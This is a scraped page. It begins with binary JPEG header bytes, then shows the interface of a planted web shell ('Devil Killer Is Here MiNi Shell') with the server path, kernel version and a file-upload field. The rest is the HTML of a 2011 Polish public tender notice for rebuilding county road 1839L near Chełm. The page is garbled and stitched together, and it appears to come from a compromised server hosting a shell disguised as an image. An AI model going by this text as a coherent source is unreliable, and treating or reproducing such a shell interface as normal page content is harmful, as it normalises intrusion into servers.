JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110207/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110207/43751-N-2011.html

<p class="kh_header"><b>Chełm: ZWIĘKSZENIE BEZPIECZEŃSTWA W RUCHU DROGOWYM NA GŁÓWNEJ OSI KOMUNIKACYJNEJ POWIATU CHEŁMSKIEGO POPRZEZ PRZEBUDOWĘ DROGI POWIATOWEJ NR 1839L</b><br>
<b>Numer ogłoszenia: 43751 - 2011; data zamieszczenia: 07.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski reprezentowany przez Krzysztofa Wojciechowskiego-Dyrektora Zarządu Dróg Powiatowych w Chełmie , ul. Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. (082) 562 76 31, faks (082) 562 75 87.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.chelmski.iap.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZWIĘKSZENIE BEZPIECZEŃSTWA W RUCHU DROGOWYM NA GŁÓWNEJ OSI KOMUNIKACYJNEJ POWIATU CHEŁMSKIEGO POPRZEZ PRZEBUDOWĘ DROGI POWIATOWEJ NR 1839L.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy głównego ciągu komunikacyjnego powiatu chełmskiego- drogi powiatowej nr 1839L na odcinku od km 0+000 (skrzyżowanie z drogą wojewódzką Nr 844) do km 14+140 (skrzyżowanie z drogami powiatowymi Nr 1862L i Nr 1863L)- o długości 14,140 km. Zakres przebudowy drogi dotyczy początkowego odcinka drogi powiatowej 14,140 km z wyłączeniem robót nawierzchniowych na odcinku 8+290,13 do km 9+296,28 przebudowanym w 2010 roku. 
Planowana do przebudowy droga powiatowa charakteryzuje się następującymi parametrami:
-klasa techniczna drogi- Z (droga zbiorcza),
-kategoria ruchu- KR 2,
-prędkość projektowa- 50 km/h,
-dopuszczalne obciążenie na oś pojazdu- 100 KN,
-przekrój drogi: jednojezdniowy dwupasowy o szerokości jezdni 6,00 m, w tym dwa pasy ruchu po 3,00m,
-szerokość zatok autobusowych- 3,00 m,
-szerokość chodników zasadniczo 2,00 m z miejscowym ograniczeniem do 1,50 m (warunki terenowe),
-szerokość poboczy gruntowych 1,00 m (w tym umocnionych kruszywem kamiennym 0,75 m),
-pochylenie skarp 1:1,5
Zakres robót obejmuje:  
I.ROBOTY PRZYGOTOWAWCZE
1.Odtworzenie (wyznaczenie) trasy i punktów wysokościowych: roboty pomiarowe przy liniowych robotach ziemnych- trasa dróg w terenie równinnym- 14,140 km
2.Zdjęcie warstwy humusu: mechaniczne usunięcie ziemi urodzajnej (humusu) o grubości do 15 cm wraz z wywozem- 36 134,00 m2.
3.Rozbiórki elementów dróg, ogrodzeń, przepustów i inne:
a)rozebranie podbudowy z kruszywa łamanego ( zatoki autobusowe, likwidacja przełomów)- materiał do zagospodarowania przez Wykonawcę- 4 148,00 m2,
b)rozebranie nawierzchni z betonu asfaltowego gr. śr. 4 cm (zatoki autobusowe, likwidacja przełomów)- materiał do zagospodarowania przez Wykonawcę- 3 760,00 m2,
c)rozebranie nawierzchni z betonu asfaltowego gr. śr. 7 cm- materiał do zagospodarowania przez Wykonawcę (ścieki na obiektach)- 64,00 m2,
d)rozebranie nawierzchni z bruku kamiennego mechanicznie (zatoki autobusowe)- materiał do zagospodarowania przez Wykonawcę- 194,00 m2,
e)rozebranie nawierzchni z trylinki (zatoki autobusowe) - materiał do zagospodarowania przez Wykonawcę- 194,00 m2,
f)rozebranie chodnika z płytek betonowych 35x35x5 cm na podsypce cementowo- piaskowej- materiał do zagospodarowania przez Wykonawcę- 42,00 m2,
g)rozebranie krawężników betonowych 20x30 cm na podsypce cementowo- piaskowej- materiał do zagospodarowania przez Wykonawcę- 747,00 m,
h)rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce cementowo -piaskowej (istniejący chodnik)- materiał do zagospodarowania przez Wykonawcę- 45,00 m,
i)rozebranie ścieków betonowych (most w km 10+781) na podsypce cementowo piaskowej- materiał do przekazania Inwestorowi- 18,00 m,
j)rozebranie barier żelbetowych mostowych (most w km 7+889 i km 10+781)- materiał do przekazania Inwestorowi- 40,00 m,
k)rozebranie barier żelbetowych drogowych- materiał do przekazania Inwestorowi- 36,00 m,
l)rozebranie barier stalowych- bariera na moście w km 3+506- materiał  do przekazania Inwestorowi- 22,00 m,
m)rozebranie ścianki czołowej przepustu z betonu (6 szt.)- materiał do zagospodarowania przez Wykonawcę- 7,00 m3,
n)rozebranie ścianki czołowej przepustu z cegły (1 szt.)- materiał do zagospodarowania przez Wykonawcę- 1,00 m3,
o)rozebranie przepustów z rur betonowych o średnicy 80 cm - materiał do zagospodarowania przez Wykonawcę- 3,00 m,
p)rozebranie słupków do znaków drogowych- materiał do przekazania Inwestorowi- 178,00 szt.,
q)rozebranie tablic znaków drogowych- materiał do przekazania Inwestorowi- 163,00 szt.,
r)rozebranie tablic znaków drogowych aktywnych (znak B-20 na wsporniku- materiał do przekazania Inwestorowi- 2,00 szt.
II.ROBOTY ZIEMNE
1.Wykonanie  wykopów w gruntach kat. III: 
a)wykonanie wykopów mechanicznie w gr. kat. III  z transportem urobku na nasyp na odl. do 1 km (teren robót)- 1 928,00 m3,
b)wykonanie wykopów mechanicznie z gruntu kat. III wraz z transportem urobku na odkład (zagospodarowanie nadmiaru urobku przez Wykonawcę)- 906,00 m3,
c)plantowanie (obrabianie na czysto) skarp i dna wykopów wykonywanych ręcznie   w gruntach kat. I-III- 90,00 m2.
2.Wykonanie nasypów w gruntach kat. III:
a)wykonanie nasypów mechanicznie z gruntu kat. III uzyskanego z wykopu  wraz z formowaniem i zagęszczaniem (uzupełnienie skarp)- 1 928,00 m3,
b)plantowanie (obrobienie na czysto) skarp i korony nasypów w gruntach kat. III- 7 413,00 m2.
III.ODWODNIENIE KORPUSU DROGOWEGO
1.Przepust pod koroną drogi:
a)wykonanie ścianki czołowej przepustu z betonu B25- dla przepustu o śr. 60 cm   wraz z wykonaniem deskowania, zbrojenia i izolacji ścian lepikiem (2 szt.)- 4,60 m3,
b)wykonanie ścianki czołowej przepustu z betonu B25- dla przepustu o śr. 80 cm    wraz z wykonaniem deskowania, zbrojenia i izolacji ścian lepikiem (4 szt.)- 10,00 m3,
c)wykonanie ścianki czołowej przepustu z betonu B25 dla przepustu o śr. 100 cm wraz z wykonaniem deskowania, zbrojenia i izolacji ścian lepikiem (2 szt.)- 6,00 m3,
d)wykonanie rekonstrukcji głowic przepustów skrzynkowych z betonu B25- gr. śr. 4 cm   wraz z wykonaniem deskowania, zbrojenia i izolacji ścian lepikiem (6 szt.)- 2,00 m3.
2.Oczyszczenie urządzeń odwadniających (przepusty): czyszczenie przepustów rurowych pod drogami, rury o średnicy do 100 cm- 42,00 m.
IV.PODBUDOWY
1.Koryto wraz  z profilowaniem i zagęszczaniem podłoża: wykonanie koryta mechanicznie wraz z profilowaniem i zagęszczaniem podłoża w gruncie kat. II-IV (likwidacja przełomów, chodniki, perony, zatoki autobusowe i zjazdy)- 10 818,00 m2.
2.Warstwy odsączające: warstwy odsączające wykonane i zagęszczane mechanicznie o gr. 14 cm (zjazdy)- 130,00 m2.
3.Oczyszczenie i skropienie warstw konstrukcyjnych:
a)oczyszczenie mechaniczne nawierzchni drogowych bitumicznych- 164 595,00 m2,
b)skropienie warstw konstrukcyjnych nawierzchni emulsją asfaltową modyfikowaną- 164 595,00  m2
4.Podbudowa z kruszywa łamanego stabilizowanego mechanicznie:
a)uzupełnienie zjazdów kruszywem  łamanym 0:31,5 mm stabilizowanym mechanicznie gr. w-wy śr. 10 cm- 2 157,00 m2,
b)wykonanie podbudowy z kruszywa łamanego 0:31,5 mm stabilizowanego mechanicznie, w-wa górna, grubość warstwy po zagęszczeniu 20 cm (likwidacja przełomów, poszerzenia) 3 320,00 m2.
5.Podbudowa z gruntu stabilizowanego cementem:
a)wykonanie podbudowy z gruntu stabilizowanego cementem z betoniarki o Rm=1,5 MPa, gr. w-wy 10 cm (chodniki i perony)- 3 349,00 m2,
b)wykonanie podbudowy z gruntu stabilizowanego cementem z betoniarki o Rm=2,5 MPa, gr. w-wy 15 cm (likwidacja przełomów, zjazdy)- 3 450,00 m2,
c)wykonanie podbudowy z gruntu stabilizowanego cementem z betoniarki o Rm=2,5  MPa, gr. w-wy 15 cm- 1 862,00 m2,
6.Podbudowa z chudego betonu: wykonanie podbudowy zasadniczej z chudego betonu o Rm=9,0 MPa, grubości w-wy 20 cm (zatoki autobusowe)- 1 596,00 m2.
V.NAWIERZCHNIE
1.Nawierzchnia z betonu asfaltowego- warstwa ścieralna: 
a)wykonanie warstwy ścieralnej z betonu asfaltowego AC8S z zastosowaniem polimeroasfaltu PMB 45/80-65, grubość warstwy po zagęszczeniu 4 cm jak dla KR2 (droga powiatowa, zjazdy i zatoki autobusowe)- 82 461,00 m2,
b)wyrównanie podbudowy betonem asfaltowym AC8S z zastosowaniem polimeroasfaltu PMB 45/80-65 jak dla KR2 (droga powiatowa i drogi boczne)- średnia grubość wyrównania 3 cm- 5 419,00 t. 
2.Nawierzchnia z betonu asfaltowego- warstwa wiążąca i wyrównawcza:
a)wykonanie warstwy wiążącej z betonu asfaltowego AC11W (zatoki autobusowe), grubość warstwy po zagęszczeniu 4 cm jak dla KR2- 1 596,00 m2,
b)wykonanie warstwy wiążącej z betonu asfaltowego AC11W (likwidacja przełomów, poszerzenia), grubość warstwy po zagęszczeniu 7 cm jak dla KR2- 3 300,00 m2,
3.Frezowanie nawierzchni asfaltowych na zimno: wykonanie frezowania nawierzchni asfaltowych na zimno: średnia grubość frezowania 1,00 cm (droga powiatowa i wcinki) wraz z transportem destruktu do 1 km- teren robót drogowych - 831,00 m3.
4.Nawierzchnia z betonowej kostki brukowej dla dróg i ulic oraz placów i chodników:
a)wykonanie nawierzchni chodników i peronów z kostki betonowej o barwie szarej gr. 6 cm na podsypce cementowo- piaskowej 1:4 gr. 3 cm- 3 349,00 m2,
b)wykonanie nawierzchni zjazdów z kostki betonowej o barwie czerwonej gr. 8 cm na podsypce cementowo- piaskowej 1:4 o gr. 3 cm- 50,00 m2.
VI.ROBOTY WYKOŃCZENIOWE
1.Umocnienie skarp, rowów i ścieków:
a)humusowanie i obsianie skarp mieszanką traw przy grubości humusu 5 cm- 7 503,00 m2,
b)ułożenie trapezowego ścieku skarpowego z elementów prefabrykowanych na podsypce cementowo -piaskowej 1:4 gr. 10 cm- 196,00 m,
c)ułożenie ścieków o szer. 0,4 m z kostki brukowej betonowej gr. 4 cm na podsypce cementowo -piaskowej 1:4 (ściek na mostach)- 53,00 m,
d)ułożenie ścieku trójkątnego o wym. 50x50 cm z elementów prefabrykowanych na podsypce cementowo- piaskowej 1:4 gr. 5 cm i ławie z betonu B15 gr. 20 cm- 83,00 m.
2.Ścinanie i uzupełnianie poboczy:
a)uzupełnianie poboczy kruszywem łamanym 0:31,5 mm stabilizowanym mechanicznie gr. w-wy śr. 10 cm- 17 738,00 m2,
b)wykonanie podparcia krawędzi opornika z destruktu gr. 30 cm stabilizowanego mechanicznie- materiał uzyskany z frezowania istniejącej nawierzchni- 2 671,00 m2.
VII.OZNAKOWANIE I URZĄDZENIA BEZPIECZEŃSTWA RUCHU
1.Oznakowanie poziome nawierzchni:
a)oznakowanie poziome jezdni  mat. grubowarstwowymi (masy termoplastyczne)- linie na przejściach dla pieszych, linie poprzeczne i symbole- 233,00 m2,
b)oznakowanie poziome jezdni mat. grubowarstwowymi- linie ciągłe- 3 766,00 m2,
c)oznakowanie poziome jezdni mat. grubowarstwowymi- linie przerywane- 2 091,00 m2.
2.Oznakowanie pionowe:
a)ustawienie słupków z rur stalowych o śr. 70 mm dla znaków drogowych i tablic- 257,00 szt.,
b)przymocowanie tarcz znaków drogowych odblaskowych do słupków stalowych- znaki ostrzegawcze A-7, znaki zakazu B-20 i znaki informacyjne D-6 (folia odblaskowa II generacji)- 53,00 szt.,
c)przymocowanie tarcz znaków drogowych odblaskowych do słupków stalowych- znaki ostrzegawcze-, tabliczki, zakazu, informacyjne i kierunku  oraz tablice prowadzące (folia odblaskowa I generacji)- 189,00 szt.,
d)ustawienie  (montaż) aktywnego znaku D-6 obustronnego (diodowy wraz z oświetlanym przejściem dla pieszych) wraz z baterią słoneczną i instalacją elektryczną umieszczony na wysięgniku- 8,00 kpl.,
e)ustawienie (montaż) aktywnego znaku B-20 obustronnego (diodowy) wraz z baterią słoneczną i instalacją elektryczną umieszczony na wysięgniku- 3,00 kpl.
3.Bariery ochronne stalowe:  ustawienie barier ochronnych stalowych jednostronnych- bezprzekładkowych typu SP-04/2- 1 155,00 m.
4.Urządzenia zabezpieczające ruch pieszych: ustawienie ogrodzeń segmentowych typu U-12a wykonanych ze stali ocynkowanej o rozstawie słupków co 1,5 m wraz z osadzeniem słupków  w fundamencie z betonu B15- 66,00 m.
VIII.ELEMENTY ULIC
1.Ustawienie krawężników betonowych:
a)ustawienie krawężników betonowych 15x30x100 cm na ławie betonowej z oporem z betonu B15 gr. 15 cm i podsypce cementowo- piaskowej 1:4 gr. 5 cm- 2 496,00 m,
b)ustawienie krawężników betonowych leżących 15x30x100 cm na ławie betonowej z oporem z betonu B15 gr. 15 cm i podsypce cementowo- piaskowej 1:4 gr. 5 cm (zjazdy)- 17,00 m.
2.Betonowe obrzeża chodnikowe: ustawienie obrzeży betonowych 60x20 cm na podsypce cementowo- piaskowej 1:4 gr. 5 cm- 2 198,00 m.
3.Ścieki z płyt chodnikowych: ułożenie ścieku pochodnikowego z płyt betonowych   o wymiarach 50x50x7 cm na podsypce cementowo- piaskowej 1:4 śr. 10 cm       wraz z obramowaniem ścieku krawężnikiem betonowym 12x25x100 cm- 132,00 m.
IX.WYPOSAŻENIE POMOSTU: ustawienie barieroporęczy o wysokości 1,1 m i rozstawie słupków co 1 m mocowanych za pomocą śrub i blachy podkładowej o wym. 200x280 mm i gr. 20 mm (obiekty inżynierskie) w ciągu bariery stalowej ochronnej SP-04- 96,00 m.
X.ROBOTY TOWARZYSZĄCE: wykonanie inwentaryzacji geodezyjnej powykonawczej- 2 egzemplarze w wersji papierowej i 1 egzemplarz w wersji elektronicznej.

Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna stanowiąca Załącznik Nr 9  do SIWZ, tj. w szczególności:
1.Projekt wykonawczy
2.Szczegółowa specyfikacja techniczna wykonania i odbioru robót.
3.Projekt stałej organizacji ruchu. 

Wykonawca udzieli Zamawiającemu na wykonany przedmiot zamówienia pisemnej gwarancji na okres 48 miesięcy, licząc od daty odbioru końcowego robót budowlanych. 

W ramach zamówienia do obowiązków Wykonawcy należy:
1.Wykonanie przedmiotu zamówienia zgodnie z projektem wykonawczym, szczegółową specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót, kosztorysem ofertowym    i zasadami wiedzy technicznej przy zastosowaniu obowiązujących przepisów   i warunków technicznych.
2.Zabezpieczenie placu budowy wraz z bezpośrednim sąsiedztwem prowadzonych prac zgodnie   z obowiązującymi zasadami bezpieczeństwa i ochrony zdrowia.
3.Opracowanie projektu czasowej zmiany organizacji ruchu na czas wykonywania przedmiotu zamówienia wraz z uzyskaniem opinii organu zarządzającego ruchem na terenie powiatu chełmskiego.
4.Zapewnienie ciągłości ruchu  w trakcie prowadzenia robót.
5.Zabezpieczenie oraz utrzymanie wszelkich elementów bezpieczeństwa ruchu  wprowadzonych na podstawie projektu organizacji ruchu na czas wykonywania przedmiotu zamówienia (oznakowania, wygrodzeń, itp.) w sposób zapewniający ich widoczność i czytelność.
6.Uporządkowanie placu budowy.
7.Wykonanie, pokrycie kosztów wszystkich badań, pomiarów, ekspertyz niezbędnych do realizacji zadania i dla udokumentowania wymaganej ilości wykonanych robót, a także wbudowanych materiałów. Wszystkie opinie i wyniki badań muszą być wykonane przez specjalistyczne laboratorium branżowe.
8.Dostarczenie Zamawiającemu wszystkich dokumentów  niezbędnych do oceny prawidłowego wykonania robót.

Zadanie realizowane jest w ramach programu Wieloletniego pod nazwą NARODOWY PROGRAM PRZEBUDOWY DRÓG LOKALNYCH 2008-2011..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości 90 000,00  zł (słownie: dziewięćdziesiąt tysięcy złotych).
2.Wykonawca wnosi wadium w formie określonej w art. 45 ust. 6 ustawy.
3.Wadium wniesione w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego:   PKO BP SA O / Chełm Nr 07 1020 1563 0000 5702 0061 5690 z dopiskiem wadium-  Zwiększenie bezpieczeństwa w ruchu drogowym na głównej osi komunikacyjnej powiatu chełmskiego poprzez przebudowę drogi powiatowej Nr 1839L. Wadium uważa się za wniesione , jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert. 
4.Dowód wniesienia wadium powinien  być dołączony do oferty. 
5.Zamawiający dokona zatrzymania bądź zwrotu wadium zgodnie z treścią art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w okresie ostatnich 5 lat przed upływem  terminu składania ofert,   a jeżeli okres prowadzenia działalności  jest krótszy-  w tym okresie, wykonał co najmniej 3 roboty budowlane  w zakresie budowy lub  przebudowy dróg w technologii   z mieszanek bitumiczno- asfaltowych,  o długości nie mniejszej niż  12,00 km m oraz  o wartości nie mniejszej niż  5 500 000,00 zł brutto każda  wraz z potwierdzeniem , że roboty te zostały wykonane zgodnie   z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien wykazać dysponowanie zasobami:
1.Samochód samowyładowczy o ładowności min. 8 t  z przykryciem brezentowym - min. 4 szt. 
2.Samochód samowyładowczy o ładowności minimalnej 8 t- min. 4 szt. 
3.Walec statyczny samojezdny min. 10 t- min.  1 szt. 
4. Walec wibracyjny- min.1 szt. 
5.Szczotka mechaniczna wyposażona w urządzenie odpylające- min. 1 szt. 
6.Walec ogumiony- min.1 szt. 
7.Przewoźny zbiornik do wody zaopatrzony w urządzenie do rozpryskiwania wody- min. 1 szt. 
8. Skrapiarka lepiszczy bitumicznych- min.2 szt. 
9Wytwórnia mas bitumicznych- min. 1 szt. 
10. Układarka do układania mieszanek mineralno- asfaltowych - min. 2 szt. 
11. Płyta wibracyjna- min. 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami:
- 1 osobą do pełnienia funkcji Kierownika budowy branży drogowej posiadającą ważne uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej oraz min. 36 miesięczny staż pracy na stanowisku kierownika budowy  lub kierownika robót przy realizacji robót branży drogowej. Uprawnienia budowlane do kierowania robotami w branży drogowej powinny być wydane zgodnie z ustawa z dnia 7 lipca 1994 r. Prawo budowlane.  W przypadku nabycia uprawnień budowlanych w innym kraju niż Polska będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej   oraz państwach Europejskiego Obszaru Gospodarczego (European Economic Area- EEA)                 i Konfederacji Szwajcarskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dotyczącego sytuacji ekonomicznej i finansowej Wykonawca winien wykazać posiadanie środków finansowych lub zdolność kredytową  w wysokości 5 000 000,00 zł oraz fakt ubezpieczenia od odpowiedzialności cywilnej    w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż  2 000 000,00  zł na wszystkie zdarzenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

